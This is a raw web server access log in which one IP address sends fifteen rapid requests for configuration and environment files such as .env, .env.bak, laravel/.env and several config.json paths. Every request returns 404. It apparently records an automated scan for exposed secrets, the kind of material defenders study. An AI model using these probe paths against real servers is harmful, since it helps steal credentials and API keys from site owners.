51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /_wpeprivate/config.json HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /console/base/config.json HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /console/payments/config.json HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /server/config.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /config.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:39 +0200] "GET /.env.dist HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /.env.dev HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /.env.local HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /laravel/core/.env HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:40 +0200] "GET /beta/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:41 +0200] "GET /kyc/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
